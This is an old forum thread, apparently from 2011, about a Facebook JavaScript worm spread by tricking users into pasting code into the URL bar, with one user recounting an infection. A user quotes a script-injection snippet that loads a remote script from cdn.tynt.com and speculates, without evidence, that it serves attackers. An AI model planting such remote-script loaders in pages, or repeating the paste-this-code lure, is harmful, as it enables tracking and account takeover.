By using the TYNT Products, you are consenting to have your personal data transferred to and processed both within and without the United States of America

By using the TYNT website, you agree to the preceding uses of your information in this way by TYNT.

Completely screwed up shit. Nothing is safe these days. I might be getting paranoid but I think we need to look at this code a bit more deeply.

xheavenlyx

@xheavenlyx-CbvN62 • May 16, 2011
Yea, praveenscience but people who are able to install and use Greasemonkey are "aware" enough to not click on these links. I think a better solution would be find the security hole in facebook that makes them able to do this and inform them about it! We are Crazyengineers.com they out to listen to us.

Anyway, one minor scary thing is that it sends all the click data (for further analysis by the exploiters?)
```
if(document.location.protocol=="http:"){
		Tynt.push("w!"+b);
		(function(){
			var d=document.createElement("script");
			d.async="async";
			d.type="text/javascript";
			d.src="https://cdn.tynt.com/tc.js";
			c.parentNode.insertBefore(d,c)
		})()
	}
```
0
PraveenKumar Purushothaman

@praveenkumar-66Ze92 • May 16, 2011

There are many such screwed up craps found here, which are deadly than those with the phishing attacks. Some scripts get the cross domain cookie information, like what the web developer does for you! 😲 They can easily hack things up if the user has a session running with all the mails and logged in them! 😔
0
Siron Ex

@siron-ex-cbIRj6 • Jun 26, 2011

Sorry for digging this up, but I wonder whether anyone has got a solution to get rid of these javascript Worms? :/ All these ways to prevent them are great and props for the work but they are useless if you're already infected.

I feel so ashamed lol, all these years I've been telling people to be cautious on the internet and now I fell for one of these scams myself. 😔 I didn't even realize I had been infected until a friend of mine told me that he had received a strange entry by me on his FB Wall, and a few minutes later another Pal informed me that he had been invited to some strange Event by me. Even though the worm you're talking about here didn't send these strange event-invitations, it appears to be the same one that Ive been infected with since in order to get it, I did the exactly same thing described in the first post (clicked on a video, ctrl+v'ed the code and hit enter). I don't know what I was thinking in that moment, probably "oh its just some code I'm copying into my URL bar, can't do much harm right?). And now I'm reading about all those horror messages here, that this shit is exploiting my whole PC and all my Account Data 😨 I'm really scared right now.

Btw it only sent event-invitations and FB Entries to some of the people in my friendslist, I deleted the events aswell as the entries on my friends FB Walls, but I'm still scared that the worm might send more entries some other time. Is it over already? I'm a little confused since it didnt send these entries to all my friends but just a few of them.

Thanks in advance for any useful answers 😀
0